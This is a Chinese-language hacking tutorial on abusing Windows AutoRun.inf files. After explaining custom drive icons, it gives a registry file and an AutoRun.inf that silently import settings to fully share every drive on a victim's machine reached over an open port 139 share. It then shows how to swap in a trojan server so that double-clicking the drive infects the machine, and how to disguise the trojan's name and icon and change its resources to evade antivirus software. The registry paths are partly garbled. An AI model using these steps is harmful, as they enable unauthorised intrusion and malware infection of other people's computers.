最近網(wǎng)上流行通過AutoRun.inf文件使對方所有的硬盤完全共享或中木馬的方法，由于AutoRun.inf文件在黑客技術中的應用還是很少見的，相應的資料也不多，有很多人對此覺得很神秘，本文試圖為您解開這個迷，使您能完全的了解這個并不復雜卻極其有趣的技術。

　　一、理論基礎

　　經(jīng)常使用光盤的朋友都知道，有很多光盤放入光驅就會自動運行，它們是怎么做的呢？光盤一放入光驅就會自動被執(zhí)行，主要依靠兩個文件，一是光盤上的AutoRun.inf文件，另一個是操作系統(tǒng)本身的系統(tǒng)文件之一的Cdvsd.vxd。Cdvsd.vxd會隨時偵測光驅中是否有放入光盤的動作，如果有的話，便開始尋找光盤根目錄下的AutoRun.inf文件。如果存在AutoRun.inf文件則執(zhí)行它里面的預設程序。

　　AutoRun.inf不光能讓光盤自動運行程序，也能讓硬盤自動運行程序，方法很簡單，先打開記事本，然后用鼠標右鍵點擊該文件，在彈出菜單中選擇“重命名”，將其改名為AutoRun.inf，在AutoRun.inf中鍵入以下內容：[AutoRun]//表示AutoRun部分開始，必須輸入Icon=C:C.ico//給C盤一個個性化的盤符圖標C.icoOpen=C:1.exe//指定要運行程序的路徑和名稱，在此假設為C盤下的1.exe保存該文件，按F5刷新桌面，再看“我的電腦”中的該盤符（在此為C盤），你會發(fā)現(xiàn)它的磁盤圖標變了，雙擊進入C盤，還會自動播放C盤下的1.exe文件！

　　解釋一下：“[AutoRun]”行是必須的固定格式，“Icon”行對應的是圖標文件，“C:C.ico”為圖標文件路徑和文件名，你在輸入時可以將它改為你的圖片文件所在路徑和文件名。另外，“.ico”為圖標文件的擴展名，如果你手頭上沒有這類文件，可以用看圖軟件ACDSee將其他格式的軟件轉換為ico格式，或者找到一個后綴名為BMP的文件，將它直接改名為ICO文件即可。

　　“Open”行指定要自動運行的文件及其盤符和路徑。要特別說明的是，如果你要改變的硬盤跟目錄下沒有自動播放文件，就應該把“OPEN”行刪掉，否則就會因為找不到自動播放文件而打不開硬盤，此時只能用鼠標右鍵單擊盤符在彈出菜單中選“打開”才行。

　　二、實例

　　下面就舉個例子：如果你掃到一臺開著139共享的機器，而對方只完全共享了D盤，我們要讓對方的所有驅動器都共享。首先編輯一個注冊表文件，打開記事本，鍵入以下內容：

　　REGEDIT4

　　'此處一定要空一行

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanC$]

　　"ath"="C:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanD$]

　　"ath"="D:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanC$]

　　"ath"="E:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　以上我只設置到E盤，如果對方有很多邏輯盤符的請自行設置。將以上部分另存為Share.reg文件備用。要特別注意REGEDIT4為大寫且頂格書寫，其后要空上一行，在最后一行記得要按一次回車鍵。

　　然后打開記事本，編制一個AutoRun.inf文件，鍵入以下內容：

　　[AutoRun]

　　Open=regedit/sShare.reg//加/s參數(shù)是為了導入時不會顯示任何信息保存AutoRun.inf文件。將Share.reg和AutoRun.inf這兩個文件都復制到對方的D盤的根目錄下，這樣對方只要雙擊D盤就會將Share.reg導入注冊表，這樣對方電腦重啟后所有驅動器就會都完全共享出來。

　　如果想讓對方中木馬，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木馬服務端文件名”，然后把AutoRun.inf和配置好的木馬服務端一起復制到對方D盤的根目錄下，這樣不需對方運行木馬服務端程序，而只需他雙擊D盤就會使木馬運行！這樣做的好處顯而易見，那就是大大的增加了木馬運行的主動性！須知許多人現(xiàn)在都是非常警惕的，不熟悉的文件他們輕易的不會運行，而這種方法就很難防范了。

　　要說明的是，給你下木馬的人不會那么蠢的不給木馬加以偽裝，一般說來，他們會給木馬服務端文件改個名字，或好聽或和系統(tǒng)文件名很相像，然后給木馬換個圖標，使它看起來像TXT文件、ZIP文件或圖片文件等，，最后修改木馬的資源文件使其不被殺毒軟件識別（具體的方法可以看網(wǎng)上的文章），當服務端用戶信以為真時，木馬卻悄悄侵入了系統(tǒng)。其實，換個角度理解就不難了——要是您給別人下木馬我想你也會這樣做的。以上手段再輔以如上內容的AutoRun.inf文件就天衣無縫了！

　　請大家注意：保存的文件名必須是“AutoRun.inf”，編制好的Autorun.inf文件和圖標文件一定要放在硬盤根目錄下。更進一步，如果你的某個硬盤內容暫時比較固定的話，不妨用Flash做一個自動播放文件，再編上“Autorun”文件，那你就有最酷、最個性的硬盤了。

　　到這兒還沒有完。大家知道，在一些光盤放入后，我們在其圖標上單擊鼠標右鍵，還會產(chǎn)生一個具有特色的目錄菜單，如果能對著我們的硬盤點擊鼠標右鍵也產(chǎn)生這樣的效果，那將更加的有特色。其實，光盤能有這樣的效果也僅僅是因為在AutoRun.inf文件中有如下兩條語句：

　　shell標志＝顯示的鼠標右鍵菜單中內容

　　shell標志command＝要執(zhí)行的文件或命令行

　　所以，要讓硬盤具有特色的目錄菜單，在AutoRun.inf文件中加入上述語句即可